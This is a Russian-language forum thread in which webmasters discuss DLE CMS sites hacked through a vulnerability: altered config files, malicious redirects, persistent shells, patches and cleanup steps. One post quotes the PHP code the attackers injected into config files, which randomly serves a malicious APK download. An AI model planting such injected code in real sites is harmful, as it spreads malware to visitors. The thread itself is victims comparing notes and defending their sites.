Вирус на сайте cms dle

О
На сайте с 04.08.2009
Offline
145
#41

В данный момент мне попадались зараженные версии 9.5 и 9.7

Влазить напрямую в базу — это невозможно © Игорь Белов, mchost.ru
S0
На сайте с 10.01.2013
Offline
1
#42

Редирект чаще всего стоит в dbconfig.php там сносите но латать дырки всерогно надо.

K5
На сайте с 21.07.2010
Offline
209
#43

файлы

index.php

engine/engine.php

engine/init.php

engine/data/config.php

engine/data/dbconfig.php

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
V
На сайте с 01.12.2005
Offline
100
#44

Есть такая же беда на одном сайте :(

Пароли менял от FTP, БД и переименованной админки и в тот же день эти 5 файлов были опять изменены. Поделитесь плз секретом как извести заразу, сил уже нет... На форуме ДЛЕ советуют снять права на запись с файлов, однако шелл так и будет сидеть до поры, до времени.

SEO продвижение сайтов, аудиты. Оценка коммерческих фaкторов, продающих способностей, юзабилити.
[Удален]
#45

Гребаный DLE, тоже ломанули, сайт андройд тематики, засунули htaccess с редиком на скачку apk файла, вероятно с sms-отправкой, только не учли, что вместо apache стоит php-fpm 😂

В следующий раз зафигачили код в конфиги

if(rand(2,4)==4&&substr($url, -9)=='.apk.html')

{
@header ("Content-Type: application/octet-stream");
@header ("Accept-Ranges: bytes");
@header ("Content-Length: ".filesize('../uploads/files/1335716503_duckhunt_1.1.apk'));
@header ("Content-Disposition: attachment; filename=".basename($url,'.apk.html').'.apk');
@readfile('../uploads/files/1335716503_duckhunt_1.1.apk');
exit;
}

но опять обламались, на сайте даже страниц нету "..apk.html", да и apk уже был удален к этому времени 🙅

---------- Добавлено 13.01.2013 в 01:21 ----------

VPsite:
Есть такая же беда на одном сайте :(
Пароли менял от FTP, БД и переименованной админки и в тот же день эти 5 файлов были опять изменены. Поделитесь плз секретом как извести заразу, сил уже нет... На форуме ДЛЕ советуют снять права на запись с файлов, однако шелл так и будет сидеть до поры, до времени.

если дедик или впс

find путь_к_сайту -name "*.php" -ctime -30

ищет измененные php файлы за последние 30 дней, но вот толку, если в дырявый ДЛЕ можно будет снова шелл залить 😡

Korew
На сайте с 31.12.2007
Offline
195
#46

Поставил заплатку http://dle-news.ru/bags/v97/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html поменял все пароли, уже пару дней нормально все...

Но проблема, видимо, в другом, раз все молчат. На оф. форуме ДЛЕ уже вроде обсуждается эта проблема, думаю целсофт что-то должны придумать в ближайшее время...

Worthy jobs
На сайте с 29.04.2010
Offline
175
#47
se0masters:
Готов помогать бесплатно, не в деньгах счастье. Писать в ЛС свои скайп и суть проблемы я свяжусь.

Суть проблемы как и у всех тут отписавшихся - добавили этот г-код и поставили редирект. Нашел и удалил. Все хорошо. Но на следующий день эта дрянь снова появилась.

Если есть знания, как залатать дырки - напишите в ЛС, пожалуйста, или в топике этом. Все равно ведь у всех все идентично.

Окей:
В данный момент мне попадались зараженные версии 9.5 и 9.7

На 9.3 тоже есть.

Самый отзывчивый хостинг (https://goo.gl/2zXp1e). У них есть 3 мин на ответ после создания тикета. Проверь! А цены... ммм.
дани мапов
На сайте с 06.09.2012
Offline
204
#48

А есть такие сайты, где регистрация пользователей запрещена, но все равно сайты взломаны?

Написание и доработка скриптов (PHP, MySQL, JavaScript, jQuery) (/ru/forum/811046)
V
На сайте с 13.01.2013
Offline
0
#49

Я сам без понятия как вирус поймал этот (((

так что я думаю движок надо будет менять обидно то что на моем сайте зарегено 322 человека .

Ну да ладно буду искать другой движок так как dle доверия уже нет. Да кстате я как то пару недель назад успел полный бекап сайта сделать все файлы чистенькие. Все файлы удалил с сервака и поновой залил бекапнутые файлы и вирус ушел пусть пока сайт работает но я буду решать что бы поменять dle на что нить другое у меня был dle 9.5

siv1987
На сайте с 02.04.2009
Offline
427
#50
Worthy jobs:
Если есть знания, как залатать дырки - напишите в ЛС, пожалуйста, или в топике этом. Все равно ведь у всех все идентично.

Обращайтесь, попробуем выявить корни..

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий